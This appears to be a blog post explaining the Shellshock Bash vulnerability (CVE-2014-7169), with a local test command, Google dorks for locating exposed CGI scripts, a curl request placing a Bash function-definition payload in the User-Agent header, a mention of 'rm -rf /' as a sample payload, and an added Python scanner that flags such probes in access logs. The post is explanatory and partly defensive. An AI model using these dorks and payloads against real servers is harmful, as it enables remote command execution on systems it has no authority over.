Explanation Of Shellshock Or BashBug With Demonstration

Hi, the vulnerability CVE-2014-7169, Shellshock, is a serious security flaw that has just been discovered in *nix Bash. As we know, Bash powers almost all Linux and Unix operating systems, even Mac. If you are reading this blog right now, there is Bash running somewhere in the background. This vulnerability is much nastier than Heartbleed: it allows an attacker to execute strings or arbitrary commands on a remote system.

From a severity perspective it goes beyond what you are thinking, and the attack is much simpler to perform. The natural behaviour of Bash allows exporting shell variables and shell functions to other Bash instances; this is accomplished by passing them through the process environment to a child process.

Proof of Concept:

The vulnerability happens because Bash does not stop after processing the function definition; it continues to parse and execute shell commands following the function. For instance, an environment variable such as

USR=() { ignored; }; /bin/ls

This will execute /bin/ls when the environment is imported into the Bash process. The command below will help you check whether your system is vulnerable or not:

env x='() { :;}; echo vulnerable' bash -c "echo Im vulnerable"

Running the above command in a Linux terminal prints "vulnerable" and "Im vulnerable". The environment command 'env' is used either to print a list of environment variables or to run another utility in a changed environment without modifying the currently existing environment. Here it runs 'bash', which executes the 'echo Im vulnerable' command, and the environment variable 'x' is imported into that 'bash' process, where the trailing 'echo vulnerable' runs as well.

Real World Example:

Use any of these Google dorks to find vulnerable index.cgi files:

allinurl:"server-status", intitle:apache "cgi-bin", sitemap.xml filetype:xml intext:"cgi-bin", filetype:sh inurl:cgi-bin

Once you have located a suitable CGI file, launch the command below, replacing "example.com/cgi-bin/test" with the one you found.

curl -i -X HEAD "http://example.com/cgi-mod/index.cgi" -A "User-Agent: () { :;}; /bin/ls"

Here, curl sends a request to the example website with the User-Agent header containing the exploit code (for example "rm -rf /"). Behind the scenes, CGI stores the HTTP headers in environment variables. Let's say example.com is running a CGI application written as a Bash script: it is then possible to craft the HTTP headers so that they exploit the Shellshock vulnerability on the target server and execute our code.

Attack Vector:

For those who run web applications, the vulnerable scenario is Bash scripts executed through cgi-bin. The CGI specification requires the web server to convert HTTP request headers supplied by the client into environment variables, so a crafted web request targeting a vulnerable CGI application can launch code on the server. Similar attacks are possible via OpenSSH, allowing secure shell sessions to bypass controls and execute code on the server.
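As an added defensive example (not part of the original post), the Python script below scans web server access log lines in the Apache/nginx "combined" format for the "() {" function-definition prefix that the exploit relies on, checking the request line, Referer and User-Agent fields, and also percent-decoding the request line so an encoded query string is caught. The log lines are constructed samples.

```python
import re
from urllib.parse import unquote

# Bash only imports a function from the environment when the value begins
# with "() {"; probes vary the whitespace, so match loosely.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")

# Combined log format: ip - - [ts] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

def is_shellshock_probe(value: str) -> bool:
    """True if a header or URL value carries a Bash function-definition prefix,
    either raw or percent-encoded (e.g. "%28%29%20%7B")."""
    return bool(SHELLSHOCK_RE.search(value) or SHELLSHOCK_RE.search(unquote(value)))

def scan_access_log(lines):
    """Return (ip, field, value) for every request whose request line,
    Referer or User-Agent looks like a Shellshock probe."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.rstrip("\n"))
        if not m:
            continue  # not combined format; skip rather than guess at fields
        for field in ("request", "referer", "ua"):
            if is_shellshock_probe(m.group(field)):
                hits.append((m.group("ip"), field, m.group(field)))
    return hits

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Sep/2014:10:01:02 +0000] "GET /cgi-bin/test HTTP/1.1" 200 512 "-" "() { :;}; /bin/ls"',
    '198.51.100.7 - - [25/Sep/2014:10:01:03 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [25/Sep/2014:10:01:04 +0000] "GET /cgi-bin/a?x=%28%29%20%7B%20%3A%3B%7D%3B%20id HTTP/1.1" 404 0 "-" "curl/7.37"',
    '192.0.2.4 - - [25/Sep/2014:10:01:05 +0000] "GET /cgi-bin/b HTTP/1.1" 200 10 "() { foo; }; /bin/ls" "Wget/1.15"',
]

if __name__ == "__main__":
    for ip, field, value in scan_access_log(SAMPLE_LOG):
        print(f"{ip} {field}: {value}")
```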

There are already four Metasploit modules in progress:

https://github.com/rapid7/metasploit-framework/pull/3880/files

https://github.com/rapid7/metasploit-framework/pull/3882/

https://github.com/rapid7/metasploit-framework/pull/3883/files

https://github.com/rapid7/metasploit-framework/pull/3884/files#r18015621

The worst part of this vulnerability is that it existed undiscovered for more than 15 years. In the next post I will cover how to patch this vulnerability.

If you feel I missed any information, feel free to comment here, I will add it to the article.
